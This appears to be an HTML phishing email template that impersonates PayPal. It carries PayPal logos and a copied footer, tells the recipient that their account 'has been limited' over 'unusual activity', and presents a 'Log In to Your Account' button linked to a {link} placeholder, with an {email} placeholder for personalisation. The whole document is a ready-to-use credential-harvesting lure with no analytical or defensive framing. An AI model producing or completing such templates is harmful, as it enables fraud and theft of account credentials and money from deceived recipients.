<div style="border-top:white 1px solid; border-right:white 1px solid; background:white; border-bottom:white 1px solid; padding-bottom:10px; padding-top:10px; padding-left:10px; border-left:white 1px solid; padding-right:10px; border-radius:5px 5px 0px 0px">
<br>
<table width="100%">
<tbody>
<tr>
<td style="width:15%"><img data-imagetype="External" src="https://upload.wikimedia.org/wikipedia/commons/thumb/b/b5/PayPal.svg/1280px-PayPal.svg.png" width="100%"> </td>
<td style="width:85%"></td>
</tr>
</tbody>
</table>
<br>
<table width="100%">
<tbody>
<tr>
<td style="width:100%">
<p align="left"><font color="#00bfff" size="13">YOUR ACCOUNT HAS BEEN LIMITED</font> </p>
</td>
</tr>
</tbody>
</table>
<br>
<table width="100%">
<tbody>
<tr>
<td style="width:100%">
<p align="left"><font color="gray" size=".9em">Dear&nbsp;{email}, your account has been limited. Because our system <br>
found unusual activity on your account. Please login to verify<br>
your account and get access to your account again.</font><br>
<br>
<br>
<a href="{link}" target="_blank" rel="noopener noreferrer" data-auth="NotApplicable">
<button style="border-top:#00bfff 1px solid; font-family:consolas; border-right:#00bfff 1px solid; width:40%; background:#00bfff; border-bottom:#00bfff 1px solid; color:white; padding-bottom:7px; padding-top:7px; padding-left:7px; border-left:#00bfff 1px solid; padding-right:7px; border-radius:3px 3px 3px 3px">
Log In to Your Account</button></a> </p>
</td>
</tr>
</tbody>
</table>
</div>
<img data-imagetype="External" src="https://www.paypal-gifts.com/media/wysiwyg/wysiwyg/background1.jpg" width="100%" height="198">
<div style="border-top:white 1px solid; border-right:white 1px solid; background:white; border-bottom:white 1px solid; padding-bottom:10px; padding-top:10px; padding-left:10px; border-left:white 1px solid; padding-right:10px; border-radius:5px 5px 0px 0px">
<br>
<table width="100%">
<tbody>
<tr>
<td style="width:10%"></td>
<td style="width:30%"><img data-imagetype="External" src="https://d2mckvlpm046l3.cloudfront.net/5c2fb277527c818d3b2ab78e815b46bb3b92078c/http%3A%2F%2Fnobcontrol.com%2Fsites%2Fall%2Fthemes%2Fbootstrap_subtheme%2Fimages%2Fpaypal-payment-option.png" width="100%"> </td>
<td style="width:10%"></td>
<td style="width:50%"><font size="5">make payments easily, quickly and securely with PayPal </font></td>
</tr>
</tbody>
</table>
<br>
<div><i><font size="1">Please do not reply to this email. We are unable to respond to inquiries sent to this address.<br>
For immediate answers to your questions, visit our Help Center by clicking "Help" located on any PayPal page or email.<br>
<br>
Copyright © 2018 PayPal, Inc. All rights reserved. PayPal is located at 2211 N. First St., San Jose, CA 95131. </font></i></div>